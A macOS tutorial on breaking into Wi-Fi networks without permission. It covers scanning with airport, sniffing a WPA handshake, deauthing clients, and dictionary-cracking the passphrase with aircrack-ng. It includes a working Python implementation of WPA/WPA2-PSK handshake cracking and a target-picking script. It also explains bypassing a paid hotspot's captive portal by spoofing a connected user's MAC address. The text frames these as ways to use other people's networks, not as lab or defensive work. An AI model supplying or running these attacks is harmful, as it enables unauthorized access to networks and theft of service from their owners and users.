Configuration: macOS 10.15

This is a tutorial for those who wonder how to connect to a Wi-Fi network when you don't have its password, and what the hacky way is to get to the internet through it.

Wi-Fi cracking depends on the network's security mode. We will cover three cases: WEP, WPA/WPA2 with a pre-shared key, and open networks behind a login page.

1 - WEP password

Too easy (and very rare nowadays)… please read this

2 - WPA or WPA2 password

Identify the target access point

First of all, we need to know which Wi-Fi network to attack. We need its MAC address (the BSSID, e.g. ba:b6:62:68:31:45) and its channel (roughly a frequency slot, e.g. 10).

We will use the macOS airport tool; there is nothing to install.

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

Results look like this:

                    SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
                  orange 1e:81:d8:dc:27:56 -87  3       Y  FR NONE
             Domino-F90A 88:f3:ab:79:f6:1a -74  1       N     WPA(PSK/TKIP/TKIP)

Note:
If you want to avoid typing /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport every time, you can create a shortcut named airport with: sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
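To pick the target automatically instead of reading the table by eye, here is an added Python example (not from the original page) that parses `airport -s` output, keeps only the WPA/WPA2-PSK rows (the only ones the dictionary attack of the next steps applies to: open, WEP, 802.1X and WPA3-SAE networks are sorted into other buckets) and builds the sniff command for each, strongest signal first. The scan text is constructed from the two rows above plus two made-up rows; the extra SSIDs and MACs, the "--" country code and the interface name are assumptions.

```python
import re

# Constructed sample of `airport -s` output: the two rows from the page plus two
# made-up rows (an SSID with spaces on a 40 MHz 5 GHz channel, and a WEP network).
SAMPLE_SCAN = """\
                            SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
                          orange 1e:81:d8:dc:27:56 -87  3       Y  FR NONE
                     Domino-F90A 88:f3:ab:79:f6:1a -74  1       N  -- WPA(PSK/TKIP/TKIP)
                   Cafe Guest 5G 2a:2a:2a:2a:2a:2a -61  36,+1   Y  FR WPA2(PSK/AES/AES)
                       OldRouter 3b:3b:3b:3b:3b:3b -80  11      N  -- WEP
"""

# The BSSID is the only column with a fixed shape, so anchor the parse on it;
# everything before it is the SSID (which may contain spaces).
ROW_RE = re.compile(
    r"^\s*(?P<ssid>.*?)\s+"
    r"(?P<bssid>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s+"
    r"(?P<rssi>-?\d+)\s+"
    r"(?P<channel>\d+(?:,[+-]\d+)?)\s+"   # "36,+1" = primary 36 plus an upper secondary channel
    r"(?P<ht>[YN])\s+"
    r"(?P<cc>\S+)\s+"
    r"(?P<security>.+?)\s*$",
    re.IGNORECASE,
)


def parse_scan(text: str) -> list[dict]:
    """Turn `airport -s` text into one dict per network (the header line never matches the BSSID pattern)."""
    networks = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        n = m.groupdict()
        n["ssid"] = n["ssid"].strip()
        n["bssid"] = n["bssid"].lower()
        n["rssi"] = int(n["rssi"])
        n["primary_channel"] = int(n["channel"].split(",")[0])  # `airport sniff` takes the primary channel
        networks.append(n)
    return networks


def classify(security: str) -> str:
    """Map the SECURITY column to the attack that applies: open, wep, wpa-psk, wpa-enterprise, wpa3 or unknown."""
    s = security.upper()
    if s == "NONE":
        return "open"
    if s.startswith("WEP"):
        return "wep"
    if s.startswith("WPA3"):
        return "wpa3"  # SAE: no offline dictionary attack on the handshake
    if s.startswith("WPA"):
        return "wpa-psk" if "PSK" in s else "wpa-enterprise"  # 802.1X has no shared passphrase to guess
    return "unknown"


def wpa_psk_targets(networks: list[dict]) -> list[dict]:
    """Networks the WPA dictionary attack applies to, strongest signal first."""
    return sorted(
        (n for n in networks if classify(n["security"]) == "wpa-psk"),
        key=lambda n: n["rssi"],
        reverse=True,
    )


def sniff_command(network: dict, iface: str = "en0") -> str:
    """The airport sniff command for this network's primary channel (the interface name is an assumption)."""
    return f"sudo airport {iface} sniff {network['primary_channel']}"


if __name__ == "__main__":
    for n in wpa_psk_targets(parse_scan(SAMPLE_SCAN)):
        print(f"{n['ssid']:<16} {n['bssid']}  ch {n['primary_channel']:<3} {n['rssi']} dBm -> {sniff_command(n)}")
```

Run it against a real scan with `airport -s | python3 pick_target.py` style piping by reading `sys.stdin` instead of `SAMPLE_SCAN`; the RSSI ordering matters because a weak signal is the most common reason a handshake capture fails.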

Sniff a channel

We now want to capture the connection information for the Domino-F90A Wi-Fi. The capture must contain the network's beacon (which carries the SSID) and, above all, the WPA 4-way handshake exchanged when a client joins: without a handshake there is nothing to crack. This is how we do it:

Let's say we are connected to the internet over the MacBook's built-in Wi-Fi and have no USB Wi-Fi adapter plugged in. Then the only interface we can scan with is the built-in one, called en0. This may differ if you plug in an external Wi-Fi card (e.g. en1). Also make sure you use sudo. Note that the 1 is the channel number from the table above, and that sniffing puts the card in monitor mode, so you lose your own connection for as long as the capture runs.

sudo airport en0 sniff 1

You should see something like:

Capturing 802.11 frames on en0.

We are now recording everything on Domino's channel. We have to wait… for what? For a handshake! It is only sent when a client connects, so we could wait a very long time, but there is a trick: we can force a client that is already connected off the network and hope it reconnects right away, which replays the handshake. This is called a deauth (deauthentication) attack.

How to deauth:

Crack the password using the dump

Stop the sniffing with Ctrl+C; airport then prints the name of the capture file.

ex: Session saved to /tmp/airportSniffP3Iz.cap

If you don't have it, install aircrack-ng (sudo port install aircrack-ng with MacPorts, or brew install aircrack-ng with Homebrew) and then crack the password. For WPA/WPA2 a wordlist is mandatory: aircrack-ng has no wordless WPA mode, it only tries the candidates you give it.

# -a 2 selects WPA-PSK mode, -w the list of common passwords, -b the target BSSID
aircrack-ng -a 2 -w commonPwd.txt -b 88:f3:ab:79:f6:1a /tmp/airportSniffP3Iz.cap
# add -e Domino-F90A if the capture has no beacon and aircrack-ng cannot find the SSID
# (-1 -a 1 is the static WEP mode of section 1, it does nothing useful on a WPA capture)

Note:
There are faster, and more efficient methods. Check out the reference section.
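To see what aircrack-ng is actually doing with that capture, here is an added Python example (not from the page and not aircrack-ng's code) that implements the WPA/WPA2-PSK check from the IEEE 802.11i key hierarchy: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), PTK = PRF-512(PMK, both MACs, both nonces), then the MIC of the second handshake message is recomputed with the KCK (first 16 bytes of the PTK) and compared with the captured one. Since no real .cap can be embedded here, the handshake is constructed in code from an assumed passphrase; the client MAC, the nonces and the wordlist are assumptions, the BSSID and SSID are the page's Domino-F90A. It handles both key descriptor versions seen on such networks: HMAC-MD5 for WPA/TKIP (like Domino-F90A) and HMAC-SHA1-128 for WPA2/CCMP.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional

MIC_OFFSET = 81  # EAPOL header (4) + descriptor fields before the Key MIC (77)


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes      # BSSID (authenticator address)
    client_mac: bytes  # supplicant address
    anonce: bytes      # from message 1 (AP -> client)
    snonce: bytes      # from message 2 (client -> AP)
    eapol: bytes       # raw EAPOL-Key frame of message 2, MIC field included
    mic: bytes         # the 16-byte MIC carried in that frame


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 'Pairwise key expansion'; bytes 0..15 of the PTK are the KCK that signs the MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def key_descriptor_version(eapol: bytes) -> int:
    """Low 3 bits of Key Information: 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP)."""
    return int.from_bytes(eapol[5:7], "big") & 0x7


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Recompute the Key MIC over the EAPOL-Key frame with its MIC field zeroed."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    version = key_descriptor_version(eapol)
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version} (AES-CMAC not implemented here)")


def crack(hs: Handshake, wordlist) -> Optional[str]:
    """Try each candidate; the first one whose KCK reproduces the captured MIC is the pre-shared key."""
    for candidate in wordlist:
        pmk = derive_pmk(candidate, hs.ssid)
        kck = derive_ptk(pmk, hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic):
            return candidate
    return None


def build_eapol_msg2(snonce: bytes, version: int, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (pairwise, MIC bit set, empty key data)."""
    key_info = 0x0108 | version                 # MIC flag (0x100) | pairwise (0x008) | descriptor version
    descriptor_type = 2 if version == 2 else 254  # 2 = RSN (WPA2), 254 = WPA1
    body = (bytes([descriptor_type])
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")           # key length
            + (1).to_bytes(8, "big")            # replay counter
            + snonce
            + b"\x00" * 16                      # key IV
            + b"\x00" * 8                       # key RSC
            + b"\x00" * 8                       # key ID / reserved
            + mic
            + (0).to_bytes(2, "big"))           # key data length
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL v1, type 3 = EAPOL-Key


def make_constructed_handshake(passphrase: str, ssid: str, version: int = 2) -> Handshake:
    """Stand-in for a real capture: build message 2 and sign it with the PSK we want to recover."""
    ap = bytes.fromhex("88f3ab79f61a")   # Domino-F90A BSSID from the scan above
    sta = bytes.fromhex("a4b1c2d3e4f5")  # assumed client MAC
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))  # assumed nonces
    unsigned = build_eapol_msg2(snonce, version)
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap, sta, anonce, snonce)[:16]
    mic = eapol_mic(kck, unsigned)
    signed = unsigned[:MIC_OFFSET] + mic + unsigned[MIC_OFFSET + 16:]
    return Handshake(ssid, ap, sta, anonce, snonce, signed, mic)


if __name__ == "__main__":
    hs = make_constructed_handshake("Domino1234", "Domino-F90A", version=1)  # TKIP like Domino-F90A
    print(crack(hs, ["123456", "password", "Domino1234"]))
```

Every guess costs 4096 HMAC-SHA1 rounds and the PMK depends on the SSID, so rainbow tables only work per SSID and the quality of the wordlist decides the outcome; this is also why GPU crackers beat aircrack-ng by orders of magnitude on the same capture. One handshake from any client is enough, because the PMK is the same for every device on the network.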

3 - No password, but a user/login window (e.g. hotel, airport…)

Let's say you want to join a Starbucks Wi-Fi but you don't have any money for a coffee, and no one wants to give you the login. Then you have one last solution: use the MAC address of someone who is already connected. Captive portals of this kind typically authorize a device by its MAC address once it has logged in, so a second device presenting the same address is let through without seeing the login page.

Spy on someone

Find someone already allowed on the network and copy their MAC address. The Kismet tool is the best suited for macOS users.

Change your MAC address (spoofing)

Let's say your Wi-Fi interface is called en0 (type ifconfig to be sure, see this for more information). The address is set with ifconfig's ether option; disassociate from any network first (airport -z), otherwise the new address may not stick, and check the result with ifconfig afterwards.

Other options:

Other tricks

TO BE CONTINUED => read this

Reference

Main source of inspiration: WPA wifi cracking on a MacBook Pro with deauth
Nice Medium tutorial: How To Crack WPA/WPA2 Wi-Fi Passwords Using Aircrack-ng
Other software: Ettercap to Intercept Passwords with ARP Spoofing
Best wireless network adapter for Wi-Fi hacking: buying list
No password: MAC address spoofing
TL;DR: short gist if you have no time
Wordlist: list of common passwords for WPA guessing
ifconfig features: hw, ether…
Spoofing issues on MacBook: reddit